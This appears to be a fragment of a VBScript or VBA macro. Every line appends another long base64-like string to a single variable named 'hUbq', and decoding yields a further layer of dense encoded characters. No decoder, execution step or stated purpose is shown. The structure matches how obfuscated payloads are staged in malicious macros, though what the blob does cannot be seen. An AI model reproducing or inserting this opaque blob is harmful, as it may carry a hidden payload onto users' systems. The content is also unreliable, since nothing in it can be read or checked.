hUbq = hUbq & "MjpJLTUoMiwvLj9SMjUqLk8/LFBCMyhGMTdCMitWLjZaMDY0MjYqLkApL1FNLjVUMiwtLjcuLFA2MVA+MDU5L00uMVpHLzNWLkVbMjo0Lz1aMjowLklLL1tSMDA5LEpNM0ZGLFoqLT1JMkk3MVBHMUZBLkBWMkRLLT1DMjUzMy1IMUI3MT1BMkQ7MEUxMVlVMDFKL0c5MVYzLy5aLC4qM0ZRLjtXMVlWLSpRMyk9LTooMjBZLjZBLzhPLE9PMDVVMkhWMjA2LFk8MDs5MEA/MThNLjIxLjFMLT4uMlJXLTk6LT1GLT5FL1tJMDs4L1FOMTNULylNLjBZLT1aL0JSLC1PLzRBL1tTL1tOLz1XLkRPMitGMVYzM0Y4Mj5VLyooL0FZM0YsMlg8MVBSLkA0LEUzMDVLMkk+LThJLCxML1FXLjs6L0JDMyxYMUJEM0IqL0M1MjUxM0BOLSsvLyo/MCtZMDA8MEQ8MUI3LjVYMUJFLkpPLkRDMUw6MTNEMD81L1FGLz1MLjs9LEswMERJLEY2MDU8MDsuMjRKLlg5Lz4uMD9KMy0qMDswMVArLFUxM0VNLE9RLzQ8MTNOLjZJLzRCMitBMlcxM0EsLy88LC0qMyk1LyoqMjo4LTQyLz1DMThGMVE+L1VaMVpGMjlbLjZEM0EqMVUoMUctMldHMzdNMTNKMj9CMlJFL0cw"
hUbq = hUbq & "LS9CMDFGLE9PL0c6LS5XMEA9M0BMMTJaMTc+MlM3Lk9TMDpSMjA8MldSMj9QMDU6LzRBMlJVMCxFMy1KMztRLTAuLjpQLTNUMlM+MTgsMlJaLk8vL1EuLEs8LT5TMzc+MkNbMEBAMDo3MyhOLzQ9M0VGLTRXLEEoLkU7LFUwMUtIMUwxMDA/LFkoMVo7LTNMMzFVLjsuLlM7LzMuMUZYL1YzLC1FLlRBLTAtLFlWLk4/LTk9LyooMDswLThQLlhNLkA/LFAsL0M0MVU9MVpSLC0rLz4tMldTMy4zMCxKLjFXMDU0LEFFLCxQMTgsLT5SL1tGMlNBMkhAL0xSMDZIMVooLFU9MT04MygvM0YwMiwtL0ZXLS5PMk08MVYtMUwyMVpZLThMLkVYMCw/Mk4zLT1MMk0vMUE6LkpKMkQtMDsyL1E0My1CMkM3LS86MisvLEpOMD9HLlg+LC04Llk/MVUrMjYpL0dWMVVKMzgqMDFDLSlaLk5ULS9XMCtQLEBJMUE5M0FOMzxRMlM5MzMrMDFOLE8sLFRCLEpQLEU6L1pBLzMuMEUsLThJLE9KMy0pL1EuMjUxLEYoLj9HMD8xMjooMUsuMUsxMjpJL0JVMD80LkBRLEpSLC0pMk1UMyhFL0FPLFQoLlRSLEBaMjpNMlJVMjAzMy42L1tLL1VHLTAoMUZZLTk1Mk02MjA7"
hUbq = hUbq & "L0daLEo5MEQ/LSpbMy02MyhaMERRMDpIMyguM0EvLy5UL1BMLj9QLS80LT46MERDMjoyMUc/LzgpLzQpLFU1MEAxMTgtLkVJLkpMMDU9LFkrLjIvMDVOLyk2M0ZQLko2MDtELFNXLzxYMUFRMThSLTk1LEEsLy5XL1BLLzhPMT1KMitDMVswLEVXLk5DMUY2Ly5UMk06L1pILEswMzxOMT05LzM+MERaMj82MTNDMjVJL1ZRMjVGMzFULjI2L1EwMUFXMDA+LSlZL0JGMk06MDBTL1ZULCxMMj9DLkpULz4zMiwtMD8rLjY7LlQyLC02Mlg+Mjo4LjVWLE8vMlcsMjVXMVRYL0ZZLT5RLjsuMiszLkRLLTkrMklAMjA7MDpaL1ZCMTNVL0wxMiwpL1ZaMEQ7Lz4vLEFDMDFDLk9PLkVSL0gwMkhRLTRZMTJCLEBQMTMqMUIyLjI4MTc7LlNALE9BMklILEZGLy44LEVUMk46MyxaMTMyLk8pMCxKMlg7MDpYMlgzLSpBLFopMUtALlNRL0tOMVpSLS80Mk44LkA6LSpSL1BLLS9DM0Y6MUJHMlg6L0ZXMEU1MUJCMzgrLkpTLTooLC08MEU7MiwwL1s0MVpKMVswLjs5LEBYL0dWMCtFMVs0LlhXMERELFUsLEYxMVE9Lyk0L1ZFMzwuMlJMMitRLFAuLkpGLC00"
hUbq = hUbq & "LEEuMEA8MykuL0gwL1E8MUEvL1VXMyg5MzZRMjU4LSlULT5LMkk1MCtAMUszMjBSMThNLTlTMUtGMThOLko3My4zL0xXM0BaMlg0LkA3L1Y5M0VDLllJMUc0MkM+MzI9MTdZL1E4MDY9MVAsLzNKLFlaLEpYMThNMD9IMCxNLzk8LTk6MVspM0FGLEY0MDpTMTgyLz1MMy06LlNBMzJKLEYxMDpXLC0rMTxRM0FRLSpALEVULTRZMT0/LEBPMkNTMzdELTRTMUtFLS9ZMldCMygxMUZYMk1QL0c/MEUoLEBYMzwvL1FLMDA3MTdALklMLlgzLz4uMDY1MzJHMlg6MVE5MUtTLjcvLT41MjlWLkopMyk4LypJMlhCL0MrMTg+MjRHLlQsLSsqLEA8LSpAMTNGMzI4Lko5LkVPMDA4LkUrMTMrLzhCMTc8LjFHMDBNMCxSMTdbLjZVMzIpLkYqLT5ULykzMy1AMjBSMklILjIwMDpEMCtXMykxLTQ6LlkoM0FNMERHMVE+LkotMzwyLz4oMUFOMlJTMjpVMUY4LEAzLjIyMVRaLjVWMyksMTNIMTNFMUZSMkNZMVBKLFA9MjVUMTJSLzk7MDY7L1IoMlJOMkQxMyhOLkU9LSpRM0FYLE9BLEowL1tDMVVFMEU0MTc7MEArLk5VL1BJLThRMDA5MVo6LllELE9WMjVb"
hUbq = hUbq & "MlMuLyo/MzJbMk1XMipPLz4wMUZPMTMvMk1SMzdUMk1YLSpHMjBCMDVNMTgtLTApLkRRLT5GL0MxMjBWMUtCMis8MTdRL1ZJMlNDL0w6MUwzLEA3MitFMjBUMldLLEBOL0tUL00sMUZSLypGMDVRLjZYMkNZLS9SMzc7LEtDLy9FMi9LLT1aL0ZYMCxMMEUtMiwyLEs+L0w9LT0/LkAuMykzLk5FLFRLMj5CLlM9LFlDL1E+M0ZWMVYwMkQqMyhAL0xNLFRMMCwuMDpELSpRLEA+MEQ9LC1SMlJUMDEuMDFDLkpLMTM9MldJLllHMzwsMlMwLk9ALEE9MlctMUJKLFlFLS9VLlRDMDpSMDFBLkBKMTMwLjY1Lyo9MEQqMlIwLEpJMkkrL1YwMDorLSpFM0YsMjBWLkBKLFlMMygwL0I5MDVXL1tQMUxALkpCLk9KLjcvL0c4LThIMkM9MUI+MERCMz0pMzJDMkM3LzhaLFRILCxZMUcxMDs8MkQwLFRDLkVbLy4rLTQwMTdYLyo2LjtQMVlXMy1XMDsuLFRKLzkpMjRQLjI6LjZYMjpLMkM+LzhPMlJELkBaLFk1Mj9UMD5bLjczLC06MTJCMk1VLzNSL1ZFLFUyLkU1LFQ9LllALT4wMCxPMzFVMVozMldILE8sLT5ZLEBWLT5PLkVIMEUyM0VNLEA5LT5RLSlb"
hUbq = hUbq & "LlM9M0BRLkBRLEE8MVpSLEs+LylULEAzL0dWLFhTMipXLTlSMlJHMTc+MzZVMVo0LC04L0JaLjY8MUYxLTNMMy0tLTAtMldLLy9DMyksMVpJMj9LMDovLE8wLSpUMk1ILFRDLkoyL1YsL1FJMTc/MERSMVY4MjpXMDVRL0JDMUZMMVY2LTNRMyk9LFlBMVVAMzdEMEQ6LFArLTAsMUYzMj89M0ZQLC00LEVRLFApLTQ1MDBVL1pbLTUqMTJDLjBbMVBIMjozLE9RLTUuLS5LM0BRLkUzLy5IMisyLFkqLC0xM0FQLk5EMitWLkA9L0dOMzI1MT1GL1ZHMjRNLT4vLjtNLT5aLk9DM0YtMkQ9LFlEMUZHMVpJLlk+Lk8yLjVXLk5JMlIxL0c7L0M2Lj9HLTk8MlJYLEs9MEQuLFU+LC4qLko1LEo2MT1GMyxZLEFKL0grL0dALEVTL1Y2LkAsMUczMk4zMk1ULz44MzI5MUsuMlc+MCs9Lz02MkNOMzJKLT5WLFArMTc/MD8xLjVXMDs0LTNUMlJMLS8vM0FLLz4uLEY7M0ZYMU9XMUw0M0BMLzktLyo5MDZAMkNYMitVMVUpMlJZLlNSLEovLC1WMDYxMkRKLTk8L0dOLT1VLyk4Lz1AMDBVLzNKL0wvLFksLzhEMiwqMi9VLEVKMTg9MT09LS5ULzMzLFosL1pA"
hUbq = hUbq & "MDo2LFA5LzMuM0VLMkM7MjVKMy43MlcrMipXL0xOLEBSLy5SMDovMldAMDtCMzxML0dRLE9NMUE7MykqLEAzMVY0L1ZXMjU0MDBZMj5BLzk6MUI5LjtFMzI4MUtPMDpLLjBXMVYsLylXLkYoLThJMThGLllMMDY0MkNUMj5FMykxMUE0MkQ6MjpLM0YrMis+LkArLkoyMldKLFUpLFUxLlNaMDY0LTQxMVlZM0ZRL0dFL1E3LC05MTgpLFBBLEVOMUZXMjAwLkRaMykyM0ZPMkQoMD9NLkpTL0dYMykpMDorLFQ9LT1WMUdDMlNFLFovMDFDLForLEs4MVVKLzk0MTdYMzMxMVBaLklILk9VLk9FMltXMz0pL0MsLy9DMTdXLy5EMEBCMis/MUc+LT4oMUIoLFQsLEVLMVBPMTNLLEY2LEs0MygxMDEpMy4rMy0+M0FUL1tVL1FZLylRLEFMLEE9LlQ8LTQ7LEtEMTxaLjVTLFo2LEA9M0EsLT1aLFQqMVs1MyhALz4xMkk2Ly5EL0gpLyo2LTQxLFlFMjRNL1FFLkk/LFBCMk00MEUrLk5ILT5BMis+MjpMMDszLzNKMkk1My0/LTQzLTRYMUJFMk4oMlM8LT4zLTNPLjI5MzdALlM+MTg+LTUoLz04LC0tM0FQLFRSMTI/MEU0MjlFMjVYLkEpLFQ8M0YuM0ZL"
hUbq = hUbq & "L0I1M0VXMThDLEpKMis1LS9BMTc+LToqMUFaMTdWMitVMT1OLEY1MTJCM0FQL0daLFk3LlNDMk1MMj9PL1pZLzk+MTw7Lz4yMzxXLklWLE9HMipTMTgoMUFWLylNMj47L1tHL0MpMTI7L1tMLjcuLzgpLEtBL1BPMjlHMUwqMDs7LFosLk5DMzxaMitFLFUoMVEvL0JYMVpWL0xPLEY5MldRMEAsMjUzLylLLFA8L1tQL1EuLEBKMzxUMkk5LEBbL1VFLEZJMEAuLT5IMipLMTNOLjtbLEBWMj8wMzxVMERaM0E6MzFWLjY0MUZUMCxNLyk4MUdGMCtELEY9L1spMj5DMy1WLy8/L0c3MT0tMUZHMjVJLk5YLFAwMUE4L0czLkpBLS8/LEFJL1E6Mkk9MisyMlMyLklLLy5YMUs1LThPLj9LLC1OMzxOMDZIMj8oMzwuMDBbMUsrLk5CLzgtM0FOLzJbMkkuM0VMM0Y3Lk5VL1YzLC0wLjpLMjUoLllKM0BIMDs0L0MwMzFaMkNRMzwqMUc3M0Y3MVErLC0yMDE+LEE/MThGMkNTLS85LTRZMjovLT46Lk9KMEQuMj81My1CL0JaLFo1M0ZUMThBMT1NM0FRLFk/MjlGL1swMis1LSspMUZTMitUMjlaL1VYMzFTL0gqL0w4MlJXMThKL1pZM0FNMykrLS9WLT5a"
hUbq = hUbq & "L0FbLC1GMzw/LklHMVA+LzQwMUZULThRLlNULFQxLTkqLFBBMDtELzQuLlQpMCw+MkRSLSpALkBbMkRMLjY2MDEtMUw3LEVRLklHMitBLyoxLy5FMlgrMjBKMVooLlk2MDA+MUYzMzxNLkVYLSlTLk9QMj5FLk9OMVE0LS5WLTRTLTkvM0ZBL1E5LEY1MlM8MjAzLlhSLEY1Lk5GLjtEMyk1MlI0L0tQMkg/Lz08MVBEL0w8Lz1OLjE7MygqMCs7MjAtLEo0L1Y6LEBQMUE5LFlaLkoqLkpIM0FVMTM/M0YtLyk0L1Y5MVRTLTlMMlM5LlQtMkRFMT0/MVRXLz1KMVsxMy1EMjBaMVEpL0grL1ZTMVo4LFkqL0w1Lk9WLEBXMUtBLS8vLkA/Mj9WMjVHMi9HMTxXMjEtMk1KL1E0MTdEMj80LFRNLFAuMlJNLlM+L1ZQMTNGLTUpLFQrLkUrLkRRL0I3LFktL0ZPL0wqMUE9LEo4MzgpMTI/LEovMkk8MTMoLFk9LEsyLT1NLjczMVRTLklVLzQ7LT1YMz0oLT4sMzdZMy4tLCxIMDVOMzcuMlJYMTw3Ljs1Mk1JLTRPLT1NMUtDLlNCLCxKMjBYL0xRMVVHMy1IMzI3LEY/Llk2MUI8LTRNLykvLT1XMztQLk9ML1soLklDLjVVMitTMzI5LjFAM0Y5MDovMDBY"
hUbq = hUbq & "MUsuM0FGLk8rMkRNL0FPLylXL0c6MUtHL0w9MUIxMTdaMVBZL0w1MklALT1HLTNHLThZMzMuLEBSMjpDLkotL0dXLlRLLz43Ljs6MztVMUI6LlRLLT5FMztQLTArMzI3LFlWLThIMzdYLSsxLjVXMj5IMjRNL1Y4LFooMlJaLFk8LEEtMy1BLEUzL1FMMkQ5MUxALjs6LS9XLE9IMzMrLS5TL0dRMjAtMTc7Mk5ILkBALSpRLkVWLkoqMlJMLj9RMzxXL0JKMjlaLjZXLzNMMjRJMlIwL1pIMykxMVpDMDU8MCw9MERMLkozLlREL1pJL1pXL1VHLz1WMkQ/MVBSMERbLz0+L0dGLFlBLThHL0MxM0VIMlMyMCtBM0BOLTArMVpVL1YwMjpVMzJXL0dOMjVJMisuMzI/LT5WMDVLMENXLkpWLkEpLzg8MygrLS5XLSlXL1sqMTw3LFQsLFAsLz4tLFhXL0dBMk4/LlQyM0FGMVlWL0FbMy4wMCtULEE3LSlULkpELEBLMztLLy45MVU/MVooLEs8LkA2MUdFLEFFLEo5MUJBL0xYMzxULFRMLypHMDA3LFRDMzxKMD81Lyk4My1AMVAoMCtALEVbMiwsLT1LM0YuLFUtMTJBMyg8LEpHLEErLTlSLkBCMlc0Mlc/Lk8zLTNTLT5QMTdBMUZMLEo4LSlaMVYwLz1L"
hUbq = hUbq & "MUxBL1ErMkk4MVU2LzMwLFoqLE8uMlcxLz1DMzgxMj8/MzZWLzhIMD8wL1Y3MTJEMlctMjVWLlRHLzxZL1FbLT4vMjo5LFRAMj5WLEFFM0FIMTJDLEA7L0JVMj9QMzdaMipYMlMyMDY9LkRPLFU+MTwzMCxELkU8MUwuMThHLkpQMTxUL0JTL1tPMy4uLkVRMEAsLk9HMjRDMisvMT03LzRCLjZbMlg5LllNLTlZLkAzL0gxLlRJM0EuMVo/L1pHMUFbMVU/LE9TMkk4LFo4Mk43LTNPLllKMzdCMzwtLC1YMzw6MUwuMzdRL1s/LT5ZM0FKMkk+LjZALjsuLzNSLy8xMzdCLk8vLyo+LkAyLzhJLkpLMjU3LkRDLTooLT4yLkYpL1FPM0E8MVBZLEpIMyhEL1BOMCxLLlhKMUc2MjYpMUZLLlkpLS84MjpXLj9NLlRKLSlaLlNALy4xLk5bMiwpLC1MMldSMklGLjs/LlhOMDZJM0FRMDpJMVY4LlRRLk8+MVBIMUE5LEZGMUtFLEs+LkpWMVVELFktMVE6L1VLLTQ3MDFLL0dbLFUvLlNCLz4yMipSL0xCLT5UMkNNMkg/MVEtMjAtLkA1L1VVL1VaMUIqL1ZTMk1QLkpaMzw3MDVQMyktLlktMTJWLzgtLSlaMkg8LTk3MDYzL0dUL0FPMVVCMis6LEVQLTlK"
hUbq = hUbq & "MzI/L1szLEFILjcrMCwyMCw7MVoyMDstLT5LMlcrL1BRLTNUMlJUMzxSLFlILk5JMjpTLFkpLyoxMjVbMT09LlRSLyo0L0MyL1FJMzI2LFU2LTAuL1E6LC0rLEBbLzNCL0JBLTRSMDU0LkVXMThAMykqMy45MDswLEpSLjtPLC1WL1Y4MTdTL00sLy9FLFlOLS9PLTUqMjpUMzJIMjpVLEFGMDZGLk5IMVYpMkNDMis3LFRRLllEMzJTMUtOMkNRLFk3MkhYMy1CMD9GMTJGL0wrMD9WLEFBLE9DMj5RLT5LLkpNMk5JMzFbLEFCMy4yLEA3MzFXMjAyLEY4Mi9OLEE7LE8xLS5YLkVLMk42Lz1EMy1EL1ZCLEstLy40LylULSpbMCwxLCxIMDYoLyo5MzxZMCwwMzgpMD9KLjsxLSo5Mzw9Mj8+Mkg5L0MxL1pAMykoL1EuMjA8Mj9UMDY7LylMMzI9LylZMlJULT46LSpWMCxELFlFLTksMTNLMDpSMCxOLy4wLFlaLTRWMTc9MyhLLTk2M0FRMDFJMzxZMyk5Mk49LC1ZMlNBLk5ZLyk7MyhKMDFLLC4oMTJDLT5QLE9HM0ZTMkhNMThQLz44M0VGMDUzMklIMEU9MklIL0FXL0dOLy9FMjA8MjpELypCMThMMlg8MjBNMyhSLS8vMThAMDBVLT4vL0w1Misv"
hUbq = hUbq & "MjAvLEtGMjRKLz0rMzI3MDA3MUszLEFIMDZHLSo9LkooMTdDMjEuL0cwL1VWLC4oM0E9MDA4LEFLMTxAL1FRLk9FMjRPLylWL0MyMyhQMDBPMlJGMU9XLE9AMERJLFo2MkhbMlJELFAxLy4zL1soLS84MDpIMi9SMzI4Ly9EMk05MldFLzk1LT4sMitFMldJLlQrMERKLylPMisxM0FVMVAvMj5JL0FUMUFLMzZLL0I9LEFALThZLS9XMitXL0I/MVRaLE8tMDY2MlJYMkROLk9ELlNYLS9DLFUxMTJHMitOMCs9MUI+MzMwMkM8MzMwMkhQMlg8LkRKMztHLEpSMD9SMUI3LkVFLTQ7L1E+LEU7MVVYMDE2MCwsLkVXMyk3LS9NLFAxLEZBMjA6Mj5DMCxELz1JL0MuLkRIMDpGLlQ5MjAqMkk4L0I1MjRDMEAvLy5HMk1QMUZZLkAyL0MxLkRDMT1OMzdTMykyMi9QLj9OMlg+MzI9My09MUtGL0dTMjVRLS9NLTQ7MUwuL0w6LC0+MzI1Mj5IMVVbMjotLC0uL0xJMldLMitOLEsuLE8zMj9DLk5ELEBTMVBFLC1NLkBQLEs8M0ZPMEA8MUwuLkAyL1ZIMTg/MDZIMlhBLFU1MjRNLjY6MzJSLSlaL1pFMis1MzxOLzMxL0JDMEU4MDo3Lj9PLlQyMis5LzhE"
hUbq = hUbq & "Mk00Mk05MkQpL0gsMTc7LkRNLT1KMkg9MVVZLz1ELkEsLSo8L1VILS5YMDpaLkpJMEU3L1YqMkhZMldOLFQxMjRaMDpGMlI5MkRGLFRPMUtKMzI9Lk5VLFQ6MDY3MztTLlNSLFoxLjwuMi9LLFhaM0ZZMUZYMUIzLSpDMjAxLlksMjU7MTNCLkU5Lk9VLTlYLT5PM0E7MTg+MTw6L0ZUMkhAMDFIMyhALkpGMTMvLTlKLT1bMUwzLE9TLkpMLT40MDFGMyk2MUsxM0EuMitGL1IqM0FNMDU8MDFDMUFXMCxOLjEqLk8uLyooLEoyMTNWLFhaLS88MTJULFRDMzZULT46MT1KMyhALjpZMTxQMEUrLkBTLS8xLlM+MzIxMVExMy1YMztVLko0LklKLykvLk5XLjVZMyxXL1s9Lz01LEVILC02Ly5HMCwsLz1ILTRMLTQ6LkU0LFosLFQsLz0qL1ZaLlkrMiwtMj9CMVYzMDsyLllIMzMvMUFRL1ZULTAuMk06LEVSMlg6MEUqMVA7MDVZMy1OMD9GMjRJLE9IL1FLMkgzLy4xMDBJMlI2M0VKMkRKLjtNLjtVMT1GMT01Lk8tMUZaLjZWMERJLjcpLFRMLE9ELTAsMzgwLjE/Mis9LFhXLSpZMykzLFQ7LlNCLTQ3Mk1WLjVYMUZELzQ3MTdULkVGMlM7MT1LL0dS"
hUbq = hUbq & "LFA6MDZHLkBQMzgrMDVLLEFNMlJPMj5AMT0oMTdbLzxXLSlbMVo6LEsvMy1OMUdCLEEuMy40MzZVMUwpL0gqMVVAL0wqLFUpLzQ/LlQ9M0FYM0EzLFRPLk5ELS5QL0c2MVpXMTgpLEstLkA/MVVGLSpSMyg/LlQvL1VaLz07MVVCM0FNLEo4Mi9OMj5AMD8vMThGLEZGMztVMUI1LllELy5OMUwwLlNAMkNQLTUrMDA5LkUoMi9MMVVKMj5UL1VXMj9CMTg8M0VMMUtULzxXLjY+LEA/LC1LMDpIMEU1L1spLTAqLjBbMUZELFlBLFAtL1FYMVs1MVArLT4pMk41LkVWM0ZPLjZGLkRJLzgoMzgxMkNbMy1EMipXLS9DLjY1MUszL0cvMj9PLzgoLlk4MzJXMj5BLS5XLkpBLzxYLko3MjBWL0dZLT5LLjpQLCxaMVo3MzcuMDpUMjowLlNQMltXMDFGLzQ4MD9TLT1NMitBLTlbLTNLMDA3MDs6LT44My0tLzg+LlQ9MjYpMTMzM0BJMlcrLS5ZMUZQMTMyLzhFMUwwLS9QMDFAMldELS5YMU9bMVU+MitYL0w3L1VYMVVaLzxTLkU2Mzc7L0tML0ZTLEY0LjZHLlM+MTxBLFUpMzM0MThGLT4qMzxRLS9OLzgxL0ZXMjlbLT1XL1BHMiwuLFo1LFAwLSpWMk04"
hUbq = hUbq & "L1EvLFAvLFUqMUc5M0FWMk5AM0U/MDZGLT5MMldCM0E6LzMuMTNBLkBZLT5BLT5OMVUpLzQpL0MxMk03LjE4LFAvMk42Mj89L1EyLjZJLkA9LEstMUw/LkVZLjsvLCxRLT5QLz04LTlRLkAyLFU5Lz1CMUc2MjBCMUI8MkM3LEtEMUYrMkRHMjEqLS9RLz1ZLTlIMkg5MUZZLC1SL0ZLMjA5L1E1LzQ0MVU5LllFMVBKLkA9MTJaLEEtMVBALzhBMUw1L1FUMzgpLjZYLSlbLTQ4MEU4MCtQLk80MDstLT1KLTQ9MzI5Ly5WMkNNMj5JLEBPL1Y2LklIMUE4Mlg3MjBVLjY3LzdbMUE8Lyk9Mkk9LTApMEROLS86LkBTLSoxMUtOMTgsLSspL0JTMzFVMzguMzdFLylZMzIxLFlaMTJJMVpWMUFWLEsuMjBLLkYpMD9GMERJLjtWM0FTMDo1L00oL0xBMEQrMkhbMVVYMTNNMVlTMkQpMipYMDs1LE8rMj5ZLFotMjVFMzMoLEs5LkRML1FRMk5EMlcxLEBOMUssMT05LT1MLE8zLFlCMUYrLT5DLEE5LlQsMjBKLkA8MUw8Lk8yLC04MiwsLFQoMUdCMlJZL1E0MDs0Mj81MzJHLz0qMVVDLyk7Lk9WM0EpLS87LEYxLk9NLyo9My0rLEs3M0FSMitOMEUxLT0/"
hUbq = hUbq & "MUxCL1VYMDtFMDsxMkhNLkpaMi9NL0cvMjBOLz1KLEU3LkAtLT44MT1IMCs/Mk5IMykuMjpNMDU0Mj9WLTlZLEFILkUpLz1CMlc1LThNLzk8MUY1LT5QMT1ILSsyMykqL1tQLz4sLkAsMUwtMTgrL0dAMUZIMUdGL1FVLCxKLE9DLC0sL1EyL1FPLzMrLzQ8LTkyLEBTL1FbLFA3MDFBMlhBMUI6M0Y2MyhDLEozMykpLSlULSpAL0cuMy1VMkNZMUsyL1FaLlhPMTg9M0E6My1WLklJLS9RMyhaMUI0LEA+LykvMDE6MjRKMCxBMk1MMThML0w7MkQ8MUZXLT43MUdCLS5TMyhKLylWMDE5MTNAL0ZXLlg7LE8xMkNbLTRWLForLkU3LTROMCtCLj9SMCwyMVBaM0VbMj5HMTNSLz1DLEA7MjpXMykxL0xLMy1LLjE+L1FGLC1SLTRPMj89Ljs+LT1JMy0rMzZVMkM8MkhBMj5DMk1NLypELFA2MDE6MDFELEBbM0VKMEAvM0EpMipUMkQ+MERDMD9QMVooLT4vMVsoL1tDLFNXLC1PMkM+LC0sL1o7MzZLMlM/LTlRMj80MTM/Mkk8MCtCMyk6LFA2Mk1RLT1ILEU6MlJGL0dDLSswMzMqMEBCMEQrMCxIMEAwMDowLEFCMztHMj8sLz1GMT1ILEFJMTgqL1E6"
hUbq = hUbq & "Ly88LzkyLFAwLTQyMVE1LllDLylGMTdULkpaMVpSMjVGLzQ3MjpMLjczMyk1MUIpLEZIMTg/LThDLkBKLz1OMVRXLEVNMT04LC1QLT4yMUtRLlRHMDZEMTJJLT4zMDE6L1ZHMDoyMjBUMCs8LS8xLEpJLC0vLlNDMUw3LS5ZLjFELFowL1ZQLE9ELTRZLk8uMVEsL0dWMUcuMzJWMipXL0c8MUc5MjAuMUc2L0MqLFRHMlI3LjpQMDA8LC1WLy4wMlI0LkRaLS89LklMLEA5My43LkBbMDY+M0FOLEA4Mk41MVA6LkA2LTUpMDU1MyxTMDZHM0VbLkRZMzc0M0VGLzhbL1E4Myk2MVpVLE8+LTk1LjE6LT1bMipZLkA6LT1IL1ZWL0gvMVBNLT4qMztVMk1UL0I6MT0sLz06Mkk/LklHLjFDLjcrMThCMDBbLEA9L0gwLk9SM0VELTk4MUZOMzw4Mj5ILylaL1VFLFA4LEZELk5RMUtMLzhKLEFFMDo5MDE1LFhXLT5DMkg8MTc9MUIzLzk1L1YoLz04MjVbMDEsMlJSLzMrMDo3LzhELSs0LT5VLTNVMDBMMk1GMUE3L1FJL1pIL1tFMTxaMVlUL0JRLTUpMTgsLForLTlNL0MtLkA3LEE2MUwvLllDL0xKM0ZCLEVILy5ZLEsvLjVaMDE+MjAsMDErLlhQLFk4"
hUbq = hUbq & "Llg5LTQvMTNPLyopLTApLFBCLFk7MzcyL0MxLzgqMzJCMjo0MzZRMDs0MUwwM0FKMztMMzwqL0dDLy5EMUc0LS87Mj5EL1VHMkNQMUZFLkpGLE9JLTkoLklZMERGMkRBMk5FM0ZZM0ZNMDYxLFk9LypJLyk1MldBMlgwMDpELSsvLEZIMzguL0dAL0ZZMyk1LzMsLEFELjs3LylILC00MUJFMVpSMUc2Myg8MUcyLz1ALE9JLE8vMzI9LC00LlRIMlZbMVs0MlMyMzFPMVVVMkQsMTdFMy0qLkBULlQ5LlQrLEVKLFU4LS9CMlgqLTQxLkA5Lj9VLE8tLlRPLy5CMy04LzdbMygoLz4qLTRZMUZILFksLEA9LT1LMUwrMldOLFRAMUE9Mj9TLS9GLjwwLy5ZLEpKMVU4MUtAMyguMzJVL1FZLy5TL1FJL1FFLTQwLFQwMlg3MldHLC1VL1tQMy4zMUw8Lk9SMUwtLz1IMjpMMy09LzNPLjZRMCxHMy01Ly4yLkYoLjIxLz0+LT45Mj5AMjVJMVUoLCxJLEVNLFhXLzk6LjYzMTxJL0xRMVpYMVBZL1ZELjFZMDE3MDo1LC1MLykzLzQrMlIxLzg6LjVYMkhQLkVQMlNBMjo2MUtEMykuLEFBLyo7Mk46MTI7LjszLFlML1tPMkQ9MlZbL1ZDMDorMlI3LT4zL0M0"
hUbq = hUbq & "LEFMMygtLy4vLEE1LTQ7L1tPLEBXMlI4LTNPMkRGLEVNLC1KMj9MLC1ILjEtMEUxLFlMMj5AMUsvMzZYLlM8MUJKMVlULT1ILC0pL0c4MlgrMy45MUswM0E2L0JALCxHMVE0MDVOLTlSLC01L1tPLTUpMlg/L0JELEo1My4qLS9YLlQ8MDY1Mj5SLCxDMipZM0FWMCtWMj9ELC1HLlNFL0ZSLzQ+LFUrLT5MLkBUMTMrLlNBLSpTL1tWLylXMDsxMj9EMkNEMVE0LjtRMVo7LkU6L0IoL1FUMUtVLT0/LFRALFA5My43MzMuLFUqLFQtLyo8MTdbMUYwLjZELkUuL1tCMj9VM0FJLy41L0cvMkNSLTRbMj5CLC1JMj9MMzZYM0ZLMEA9LEZAMUtOLFQwLlROLC00LSs0L0c8MUY5LkVGLTUqMzZULCxRLkpKMk41MDpDLSpVL0ZXMThLLEU3LC0sMy1FMUtQMTI/M0E3LS84LFQsL0JAL0ZTMj8pMDZDMj9FM0FKMj82LFhXLz44LT1YLypCLFUpL1tPLFlMLTNVMyxTMTdALE9NMj5aMDZFLFUtMUw8L1pCL0dAMztRLEA3LFlaMj5AMjVWMipYMDEoM0VIMj5YMzZPMUJIMUYzLEY1L0cyLThDMj5DMDBYMkg4MDBYLS5YMUtGMkg6MUsvLC1HLFU0MTNCLy42"
hUbq = hUbq & "LjFMMUtILT0/LFRAMTc7MTw8MklNMUE8MDZELEVZMERJMzZPMTI/MlJMLEswMVRaMj9BLFRLMCwvMDYoMUc0LFA8MUY2LEVRMTg8MjU5MzM1MDsuLkYqLlhZMkhOMlM5LEE9MDUzMkRFMipLL0xCMVAxLSlXLFlMM0ZRMDE9MUxCMUZML1E+LjZbMlJQLEs5LE9LMTNDLT4pLC1XMVArM0YyMj9WLTkzMj5YMlI1LEZKL1spMTNCL1pCL0I4LT0/M0ZSMUcyLkVKMT08MzZTLjYxL0FPLFosL0gwLT4wMldFMCxAMjo0LlM+Mlg7MzZULkA5LyoxMkQoMkNBMkM7LzM1L0JZLS5WLTNLL0c8L0JSLjVaMzdSLFU0LT4vL0ZLL0I8LT4oLFA8L1E7MjpILEA7LTQ7LzNUMzZRLC1RLyk6Lj9RL0JFMlM8My1ALko6MUpbMUYzLT5DLC4oMDovMEU7MjVPM0ZWL0cyL0gsLzxTLEtDMVBLLj9QMCtFLS5YLT5LMj8+LSpBMy0sMzdUMERDLkEuM0YxM0ZBL1ZZMDA+MzZSLz0oMUsuMD8tMD8yLFU+LEsvMk1WLj9TMjpCMTg6MTxTMitYLjsxLzg/MDpCMjEuL0tUMlMyMCtQLk9SLCxDMzMsLz1YMjROLSs2LT4tLTAqL0c5MjRIMklELFlBLz1MLjY+LT42LE9R"
